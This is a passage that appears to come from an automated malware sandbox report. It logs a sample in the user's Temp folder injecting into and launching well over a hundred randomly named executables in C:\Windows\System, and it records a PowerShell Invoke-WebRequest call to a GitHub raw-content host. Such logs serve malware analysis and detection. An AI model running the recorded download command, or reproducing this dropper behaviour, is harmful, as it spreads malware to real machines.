PID 2020 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\IzGIifB.exe
PID 2020 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\IzGIifB.exe
PID 2020 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\sgZrsWT.exe
PID 2020 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\sgZrsWT.exe
PID 2020 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\sgZrsWT.exe
PID 2020 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\tBWhVgW.exe
PID 2020 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\tBWhVgW.exe
PID 2020 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\tBWhVgW.exe
PID 2020 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\AJHBYeR.exe
PID 2020 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\AJHBYeR.exe
PID 2020 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\AJHBYeR.exe
PID 2020 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\bBuzmaY.exe
PID 2020 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\bBuzmaY.exe
PID 2020 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\bBuzmaY.exe
PID 2020 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\bczcFtN.exe
PID 2020 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\bczcFtN.exe
PID 2020 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\bczcFtN.exe
PID 2020 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\oPqtWIx.exe
PID 2020 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\oPqtWIx.exe
PID 2020 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\oPqtWIx.exe
PID 2020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\NbUAmUl.exe
PID 2020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\NbUAmUl.exe
PID 2020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\NbUAmUl.exe
PID 2020 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\FKbhKNw.exe
PID 2020 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\FKbhKNw.exe
PID 2020 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\FKbhKNw.exe
PID 2020 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\QAESDrk.exe
PID 2020 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\QAESDrk.exe
PID 2020 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\QAESDrk.exe
PID 2020 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\HyXCoMx.exe
PID 2020 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\HyXCoMx.exe
PID 2020 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\HyXCoMx.exe
PID 2020 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\EudHpZR.exe
PID 2020 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\EudHpZR.exe
PID 2020 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\EudHpZR.exe
PID 2020 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\TSjYYsR.exe
PID 2020 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\TSjYYsR.exe
PID 2020 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\TSjYYsR.exe
PID 2020 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\ljOhnSW.exe
PID 2020 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\ljOhnSW.exe
PID 2020 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\ljOhnSW.exe
PID 2020 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\NRPfLOi.exe
PID 2020 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\NRPfLOi.exe
PID 2020 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\NRPfLOi.exe
PID 2020 wrote to memory of 284 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\hnWqhUq.exe
PID 2020 wrote to memory of 284 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\hnWqhUq.exe
PID 2020 wrote to memory of 284 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\hnWqhUq.exe
PID 2020 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\HDEHqqV.exe
PID 2020 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\HDEHqqV.exe
PID 2020 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\HDEHqqV.exe
PID 2020 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\eQWVpHH.exe
PID 2020 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\eQWVpHH.exe
PID 2020 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\eQWVpHH.exe
PID 2020 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\LSOQmCy.exe
PID 2020 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\LSOQmCy.exe
PID 2020 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\LSOQmCy.exe
PID 2020 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\CwfhlQm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\XiSXgWX.exe

C:\Windows\System\XiSXgWX.exe

C:\Windows\System\IzGIifB.exe

C:\Windows\System\IzGIifB.exe

C:\Windows\System\sgZrsWT.exe

C:\Windows\System\sgZrsWT.exe

C:\Windows\System\tBWhVgW.exe

C:\Windows\System\tBWhVgW.exe

C:\Windows\System\AJHBYeR.exe

C:\Windows\System\AJHBYeR.exe

C:\Windows\System\bBuzmaY.exe

C:\Windows\System\bBuzmaY.exe

C:\Windows\System\bczcFtN.exe

C:\Windows\System\bczcFtN.exe

C:\Windows\System\oPqtWIx.exe

C:\Windows\System\oPqtWIx.exe

C:\Windows\System\NbUAmUl.exe

C:\Windows\System\NbUAmUl.exe

C:\Windows\System\FKbhKNw.exe

C:\Windows\System\FKbhKNw.exe

C:\Windows\System\QAESDrk.exe

C:\Windows\System\QAESDrk.exe

C:\Windows\System\HyXCoMx.exe

C:\Windows\System\HyXCoMx.exe

C:\Windows\System\EudHpZR.exe

C:\Windows\System\EudHpZR.exe

C:\Windows\System\TSjYYsR.exe

C:\Windows\System\TSjYYsR.exe

C:\Windows\System\ljOhnSW.exe

C:\Windows\System\ljOhnSW.exe

C:\Windows\System\NRPfLOi.exe

C:\Windows\System\NRPfLOi.exe

C:\Windows\System\hnWqhUq.exe

C:\Windows\System\hnWqhUq.exe

C:\Windows\System\HDEHqqV.exe

C:\Windows\System\HDEHqqV.exe

C:\Windows\System\eQWVpHH.exe

C:\Windows\System\eQWVpHH.exe

C:\Windows\System\LSOQmCy.exe

C:\Windows\System\LSOQmCy.exe

C:\Windows\System\CwfhlQm.exe

C:\Windows\System\CwfhlQm.exe

C:\Windows\System\ezlYgRK.exe

C:\Windows\System\ezlYgRK.exe

C:\Windows\System\zrmsoGV.exe

C:\Windows\System\zrmsoGV.exe

C:\Windows\System\rTkPagf.exe

C:\Windows\System\rTkPagf.exe

C:\Windows\System\AVceWtm.exe

C:\Windows\System\AVceWtm.exe

C:\Windows\System\rhjfoqW.exe

C:\Windows\System\rhjfoqW.exe

C:\Windows\System\CzutKvq.exe

C:\Windows\System\CzutKvq.exe

C:\Windows\System\ljPjhmS.exe

C:\Windows\System\ljPjhmS.exe

C:\Windows\System\euBITjP.exe

C:\Windows\System\euBITjP.exe

C:\Windows\System\dMXfEPy.exe

C:\Windows\System\dMXfEPy.exe

C:\Windows\System\PdOWNLu.exe

C:\Windows\System\PdOWNLu.exe

C:\Windows\System\YkCuwWO.exe

C:\Windows\System\YkCuwWO.exe

C:\Windows\System\UbLpRbF.exe

C:\Windows\System\UbLpRbF.exe

C:\Windows\System\ekCFyxy.exe

C:\Windows\System\ekCFyxy.exe

C:\Windows\System\ADSUSTw.exe

C:\Windows\System\ADSUSTw.exe

C:\Windows\System\pxxSNnV.exe

C:\Windows\System\pxxSNnV.exe

C:\Windows\System\ZWmqeXS.exe

C:\Windows\System\ZWmqeXS.exe

C:\Windows\System\BlJHxwv.exe

C:\Windows\System\BlJHxwv.exe

C:\Windows\System\ICqBucV.exe

C:\Windows\System\ICqBucV.exe

C:\Windows\System\UZGEYbm.exe

C:\Windows\System\UZGEYbm.exe

C:\Windows\System\UKsBdmD.exe

C:\Windows\System\UKsBdmD.exe

C:\Windows\System\cATumuE.exe

C:\Windows\System\cATumuE.exe

C:\Windows\System\dtezqnp.exe

C:\Windows\System\dtezqnp.exe

C:\Windows\System\hNnBPSK.exe

C:\Windows\System\hNnBPSK.exe

C:\Windows\System\kgeltko.exe

C:\Windows\System\kgeltko.exe

C:\Windows\System\wcOuPeW.exe

C:\Windows\System\wcOuPeW.exe

C:\Windows\System\vVBzptI.exe

C:\Windows\System\vVBzptI.exe

C:\Windows\System\ppdmKFk.exe

C:\Windows\System\ppdmKFk.exe

C:\Windows\System\QbABEUj.exe

C:\Windows\System\QbABEUj.exe

C:\Windows\System\zPvdkKD.exe

C:\Windows\System\zPvdkKD.exe

C:\Windows\System\ZfTNGKm.exe

C:\Windows\System\ZfTNGKm.exe

C:\Windows\System\dzXjhNJ.exe

C:\Windows\System\dzXjhNJ.exe

C:\Windows\System\joXDfOG.exe

C:\Windows\System\joXDfOG.exe

C:\Windows\System\FXFUlxY.exe

C:\Windows\System\FXFUlxY.exe

C:\Windows\System\BKQSmAb.exe

C:\Windows\System\BKQSmAb.exe

C:\Windows\System\RrjkBNC.exe

C:\Windows\System\RrjkBNC.exe

C:\Windows\System\FSyXbUY.exe

C:\Windows\System\FSyXbUY.exe

C:\Windows\System\lpzojzg.exe

C:\Windows\System\lpzojzg.exe

C:\Windows\System\WtAiTQy.exe

C:\Windows\System\WtAiTQy.exe

C:\Windows\System\BkABSsy.exe

C:\Windows\System\BkABSsy.exe

C:\Windows\System\jLBhIUr.exe

C:\Windows\System\jLBhIUr.exe

C:\Windows\System\CxmaiIQ.exe

C:\Windows\System\CxmaiIQ.exe

C:\Windows\System\uOftAVE.exe

C:\Windows\System\uOftAVE.exe

C:\Windows\System\vrhquPc.exe

C:\Windows\System\vrhquPc.exe

C:\Windows\System\qULjLeG.exe

C:\Windows\System\qULjLeG.exe

C:\Windows\System\EMNGTpb.exe

C:\Windows\System\EMNGTpb.exe

C:\Windows\System\gNPrxAQ.exe

C:\Windows\System\gNPrxAQ.exe

C:\Windows\System\ASLdOBo.exe

C:\Windows\System\ASLdOBo.exe

C:\Windows\System\dNYPRAn.exe

C:\Windows\System\dNYPRAn.exe

C:\Windows\System\TJPxIYa.exe

C:\Windows\System\TJPxIYa.exe

C:\Windows\System\cgfvftQ.exe

C:\Windows\System\cgfvftQ.exe

C:\Windows\System\wrDLVtl.exe

C:\Windows\System\wrDLVtl.exe

C:\Windows\System\kxYvKct.exe

C:\Windows\System\kxYvKct.exe

C:\Windows\System\eKLQNtN.exe

C:\Windows\System\eKLQNtN.exe

C:\Windows\System\PTYHDrG.exe

C:\Windows\System\PTYHDrG.exe

C:\Windows\System\dfFdAht.exe

C:\Windows\System\dfFdAht.exe

C:\Windows\System\DpHcdse.exe

C:\Windows\System\DpHcdse.exe

C:\Windows\System\TShozUK.exe

C:\Windows\System\TShozUK.exe

C:\Windows\System\qeypowA.exe

C:\Windows\System\qeypowA.exe

C:\Windows\System\CSAbHec.exe

C:\Windows\System\CSAbHec.exe

C:\Windows\System\MKrFlQV.exe

C:\Windows\System\MKrFlQV.exe

C:\Windows\System\cXkHdpz.exe

C:\Windows\System\cXkHdpz.exe

C:\Windows\System\SCaJaNI.exe

C:\Windows\System\SCaJaNI.exe

C:\Windows\System\dyZyutn.exe

C:\Windows\System\dyZyutn.exe

C:\Windows\System\cIATDDo.exe

C:\Windows\System\cIATDDo.exe

C:\Windows\System\TRykEyo.exe

C:\Windows\System\TRykEyo.exe

C:\Windows\System\PNWzoGJ.exe

C:\Windows\System\PNWzoGJ.exe

C:\Windows\System\IjOaaDU.exe

C:\Windows\System\IjOaaDU.exe

C:\Windows\System\xRVeAJI.exe

C:\Windows\System\xRVeAJI.exe

C:\Windows\System\umBlCZp.exe

C:\Windows\System\umBlCZp.exe

C:\Windows\System\YrnJJHK.exe

C:\Windows\System\YrnJJHK.exe

C:\Windows\System\NGxzwnA.exe

C:\Windows\System\NGxzwnA.exe

C:\Windows\System\aZMscVm.exe

C:\Windows\System\aZMscVm.exe

C:\Windows\System\HaefFYZ.exe

C:\Windows\System\HaefFYZ.exe

C:\Windows\System\sAGSQpp.exe

C:\Windows\System\sAGSQpp.exe

C:\Windows\System\RMnCIYN.exe

C:\Windows\System\RMnCIYN.exe

C:\Windows\System\vBDSlNW.exe

C:\Windows\System\vBDSlNW.exe

C:\Windows\System\SGJMRtY.exe

C:\Windows\System\SGJMRtY.exe

C:\Windows\System\VpfDQTZ.exe

C:\Windows\System\VpfDQTZ.exe

C:\Windows\System\YnJnbWv.exe

C:\Windows\System\YnJnbWv.exe

C:\Windows\System\hGYsHNj.exe

C:\Windows\System\hGYsHNj.exe

C:\Windows\System\phAZgDM.exe

C:\Windows\System\phAZgDM.exe

C:\Windows\System\kYhzjfB.exe

C:\Windows\System\kYhzjfB.exe

C:\Windows\System\lfyMsqf.exe

C:\Windows\System\lfyMsqf.exe

C:\Windows\System\Biooglv.exe

C:\Windows\System\Biooglv.exe

C:\Windows\System\MswsdPX.exe

C:\Windows\System\MswsdPX.exe

C:\Windows\System\vQgztwt.exe

C:\Windows\System\vQgztwt.exe

C:\Windows\System\BZInBRs.exe

C:\Windows\System\BZInBRs.exe

C:\Windows\System\MAghOhC.exe

C:\Windows\System\MAghOhC.exe

C:\Windows\System\eCRhsOg.exe

C:\Windows\System\eCRhsOg.exe

C:\Windows\System\XcgpigK.exe

C:\Windows\System\XcgpigK.exe

C:\Windows\System\UaopJii.exe

C:\Windows\System\UaopJii.exe

C:\Windows\System\PmIKpZB.exe

C:\Windows\System\PmIKpZB.exe

C:\Windows\System\hVCPoUu.exe

C:\Windows\System\hVCPoUu.exe

C:\Windows\System\FSnAhHz.exe

C:\Windows\System\FSnAhHz.exe

C:\Windows\System\bIExqhO.exe

C:\Windows\System\bIExqhO.exe

C:\Windows\System\rXNChVn.exe

C:\Windows\System\rXNChVn.exe

C:\Windows\System\KRsNlEx.exe

C:\Windows\System\KRsNlEx.exe

C:\Windows\System\yOAAUQg.exe

C:\Windows\System\yOAAUQg.exe

C:\Windows\System\fRIJjqT.exe

C:\Windows\System\fRIJjqT.exe

C:\Windows\System\sJLytoa.exe

C:\Windows\System\sJLytoa.exe

C:\Windows\System\XtuiwHx.exe

C:\Windows\System\XtuiwHx.exe

C:\Windows\System\HtDCyws.exe

C:\Windows\System\HtDCyws.exe

C:\Windows\System\CWrUTRC.exe

C:\Windows\System\CWrUTRC.exe

C:\Windows\System\UHAirQq.exe

C:\Windows\System\UHAirQq.exe

C:\Windows\System\yteVWtg.exe

C:\Windows\System\yteVWtg.exe

C:\Windows\System\naJOUTW.exe

C:\Windows\System\naJOUTW.exe

C:\Windows\System\HzvWuKR.exe

C:\Windows\System\HzvWuKR.exe

C:\Windows\System\HixtbiD.exe

C:\Windows\System\HixtbiD.exe

C:\Windows\System\JgfojDd.exe

C:\Windows\System\JgfojDd.exe

C:\Windows\System\eULgZrK.exe

C:\Windows\System\eULgZrK.exe

C:\Windows\System\TthwAaF.exe

C:\Windows\System\TthwAaF.exe

C:\Windows\System\MRjxtSJ.exe

C:\Windows\System\MRjxtSJ.exe

C:\Windows\System\qGwwUAR.exe

C:\Windows\System\qGwwUAR.exe

C:\Windows\System\iYOVigO.exe

C:\Windows\System\iYOVigO.exe

C:\Windows\System\RjqAnWi.exe

C:\Windows\System\RjqAnWi.exe

C:\Windows\System\zZFYkvD.exe

C:\Windows\System\zZFYkvD.exe

C:\Windows\System\YyaOrvj.exe

C:\Windows\System\YyaOrvj.exe

C:\Windows\System\vOWUjoQ.exe

C:\Windows\System\vOWUjoQ.exe

C:\Windows\System\HBPqyod.exe

C:\Windows\System\HBPqyod.exe

C:\Windows\System\QTgKXMB.exe

C:\Windows\System\QTgKXMB.exe

C:\Windows\System\SrJejTi.exe

C:\Windows\System\SrJejTi.exe

C:\Windows\System\jtzEPVd.exe

C:\Windows\System\jtzEPVd.exe

C:\Windows\System\cOwaiMg.exe

C:\Windows\System\cOwaiMg.exe

C:\Windows\System\vyyHXLn.exe

C:\Windows\System\vyyHXLn.exe

C:\Windows\System\DPKnDiv.exe

C:\Windows\System\DPKnDiv.exe

C:\Windows\System\XPRaGQI.exe

C:\Windows\System\XPRaGQI.exe

C:\Windows\System\LohOcfq.exe

C:\Windows\System\LohOcfq.exe

C:\Windows\System\AajCVTT.exe

C:\Windows\System\AajCVTT.exe

C:\Windows\System\nPEbNyA.exe

C:\Windows\System\nPEbNyA.exe

C:\Windows\System\ycfFaSU.exe

C:\Windows\System\ycfFaSU.exe

C:\Windows\System\fuWVqby.exe

C:\Windows\System\fuWVqby.exe

C:\Windows\System\WrkMJpD.exe

C:\Windows\System\WrkMJpD.exe

C:\Windows\System\juWmzuV.exe

C:\Windows\System\juWmzuV.exe

C:\Windows\System\XnfVMgv.exe

C:\Windows\System\XnfVMgv.exe

C:\Windows\System\xXhNTHR.exe

C:\Windows\System\xXhNTHR.exe

C:\Windows\System\dCynUXR.exe

C:\Windows\System\dCynUXR.exe

C:\Windows\System\UJHFrAH.exe

C:\Windows\System\UJHFrAH.exe

C:\Windows\System\qRrcMFq.exe

C:\Windows\System\qRrcMFq.exe

C:\Windows\System\IfbrcQV.exe

C:\Windows\System\IfbrcQV.exe

C:\Windows\System\kUDRmBD.exe

C:\Windows\System\kUDRmBD.exe

C:\Windows\System\kYSYXKS.exe

C:\Windows\System\kYSYXKS.exe

C:\Windows\System\bOSGnBf.exe

C:\Windows\System\bOSGnBf.exe

C:\Windows\System\jORXuwT.exe

C:\Windows\System\jORXuwT.exe

C:\Windows\System\XdlqbQz.exe

C:\Windows\System\XdlqbQz.exe

C:\Windows\System\gDndFZT.exe

C:\Windows\System\gDndFZT.exe

C:\Windows\System\zoSrYWE.exe

C:\Windows\System\zoSrYWE.exe

C:\Windows\System\nsBbgaA.exe

C:\Windows\System\nsBbgaA.exe

C:\Windows\System\KkqhlkH.exe

C:\Windows\System\KkqhlkH.exe

C:\Windows\System\ebpzfxT.exe

C:\Windows\System\ebpzfxT.exe

C:\Windows\System\fOQgxBK.exe

C:\Windows\System\fOQgxBK.exe

C:\Windows\System\sCjrdwN.exe

C:\Windows\System\sCjrdwN.exe

C:\Windows\System\NgUQWEA.exe

C:\Windows\System\NgUQWEA.exe

C:\Windows\System\AVNCnAN.exe

C:\Windows\System\AVNCnAN.exe

C:\Windows\System\sYzcuui.exe

C:\Windows\System\sYzcuui.exe

C:\Windows\System\pOJJIxP.exe

C:\Windows\System\pOJJIxP.exe

C:\Windows\System\FTtYEGy.exe

C:\Windows\System\FTtYEGy.exe

C:\Windows\System\syoJpLq.exe

C:\Windows\System\syoJpLq.exe

C:\Windows\System\zFADLZU.exe

C:\Windows\System\zFADLZU.exe

C:\Windows\System\xLSCcFU.exe

C:\Windows\System\xLSCcFU.exe

C:\Windows\System\lRqVCSo.exe

C:\Windows\System\lRqVCSo.exe

C:\Windows\System\esUBPWh.exe

C:\Windows\System\esUBPWh.exe

C:\Windows\System\bQSVVwl.exe

C:\Windows\System\bQSVVwl.exe

C:\Windows\System\bSPedBF.exe

C:\Windows\System\bSPedBF.exe

C:\Windows\System\rVyjgbf.exe

C:\Windows\System\rVyjgbf.exe

C:\Windows\System\jNsblAw.exe

C:\Windows\System\jNsblAw.exe

C:\Windows\System\YEQCYRX.exe

C:\Windows\System\YEQCYRX.exe

C:\Windows\System\kdftpQt.exe

C:\Windows\System\kdftpQt.exe

C:\Windows\System\DilPtte.exe

C:\Windows\System\DilPtte.exe

C:\Windows\System\NXaObYv.exe

C:\Windows\System\NXaObYv.exe

C:\Windows\System\YQIVpBL.exe

C:\Windows\System\YQIVpBL.exe

C:\Windows\System\YWgrauL.exe

C:\Windows\System\YWgrauL.exe

C:\Windows\System\dSMtVcK.exe

C:\Windows\System\dSMtVcK.exe

C:\Windows\System\kiQiDPQ.exe

C:\Windows\System\kiQiDPQ.exe

C:\Windows\System\FTxlZLE.exe

C:\Windows\System\FTxlZLE.exe

C:\Windows\System\SkTQwRs.exe

C:\Windows\System\SkTQwRs.exe

C:\Windows\System\FnyPNSM.exe

C:\Windows\System\FnyPNSM.exe

C:\Windows\System\lpGRVQI.exe

C:\Windows\System\lpGRVQI.exe

C:\Windows\System\aSfwDGW.exe

C:\Windows\System\aSfwDGW.exe

C:\Windows\System\UhtRgJf.exe

C:\Windows\System\UhtRgJf.exe

C:\Windows\System\KRzYYJD.exe

C:\Windows\System\KRzYYJD.exe

C:\Windows\System\pEsZoJV.exe

C:\Windows\System\pEsZoJV.exe

C:\Windows\System\tErlbfn.exe

C:\Windows\System\tErlbfn.exe

C:\Windows\System\UBhOxyD.exe

C:\Windows\System\UBhOxyD.exe

C:\Windows\System\bEQDyJU.exe

C:\Windows\System\bEQDyJU.exe

C:\Windows\System\GNNqxxR.exe

C:\Windows\System\GNNqxxR.exe

C:\Windows\System\XZEpjAU.exe

C:\Windows\System\XZEpjAU.exe

C:\Windows\System\savStAI.exe

C:\Windows\System\savStAI.exe

C:\Windows\System\OLhDvBD.exe

C:\Windows\System\OLhDvBD.exe

C:\Windows\System\PCUmlUv.exe

C:\Windows\System\PCUmlUv.exe

C:\Windows\System\egOvvUW.exe

C:\Windows\System\egOvvUW.exe

C:\Windows\System\APFEnEc.exe

C:\Windows\System\APFEnEc.exe

C:\Windows\System\BYxJisO.exe

C:\Windows\System\BYxJisO.exe

C:\Windows\System\HneYUWU.exe

C:\Windows\System\HneYUWU.exe

C:\Windows\System\BFhZFtm.exe

C:\Windows\System\BFhZFtm.exe

C:\Windows\System\fIoktQN.exe

C:\Windows\System\fIoktQN.exe

C:\Windows\System\nNaIDgq.exe

C:\Windows\System\nNaIDgq.exe

C:\Windows\System\uidsrPN.exe

C:\Windows\System\uidsrPN.exe

C:\Windows\System\LJiBidI.exe

C:\Windows\System\LJiBidI.exe

C:\Windows\System\UBhhdmZ.exe

C:\Windows\System\UBhhdmZ.exe

C:\Windows\System\YHCKRyx.exe

C:\Windows\System\YHCKRyx.exe

C:\Windows\System\ZZgxDXn.exe

C:\Windows\System\ZZgxDXn.exe

C:\Windows\System\zzNpigC.exe

C:\Windows\System\zzNpigC.exe

C:\Windows\System\cOJbUAl.exe

C:\Windows\System\cOJbUAl.exe

C:\Windows\System\SRgXpBO.exe

C:\Windows\System\SRgXpBO.exe

C:\Windows\System\UUqsUcG.exe

C:\Windows\System\UUqsUcG.exe

C:\Windows\System\jTcApLa.exe

C:\Windows\System\jTcApLa.exe

C:\Windows\System\lbVcjFK.exe

C:\Windows\System\lbVcjFK.exe

C:\Windows\System\qsBEHpJ.exe

C:\Windows\System\qsBEHpJ.exe

C:\Windows\System\TKQgHOF.exe

C:\Windows\System\TKQgHOF.exe

C:\Windows\System\xAmWwrG.exe

C:\Windows\System\xAmWwrG.exe

C:\Windows\System\zUyKnrZ.exe

C:\Windows\System\zUyKnrZ.exe

C:\Windows\System\LfIjsJN.exe

C:\Windows\System\LfIjsJN.exe

C:\Windows\System\BFMRwAA.exe

C:\Windows\System\BFMRwAA.exe

C:\Windows\System\gnCWQBH.exe

C:\Windows\System\gnCWQBH.exe

C:\Windows\System\jEiCrOQ.exe

C:\Windows\System\jEiCrOQ.exe

C:\Windows\System\dizXOwz.exe

C:\Windows\System\dizXOwz.exe

C:\Windows\System\NiJxUqZ.exe

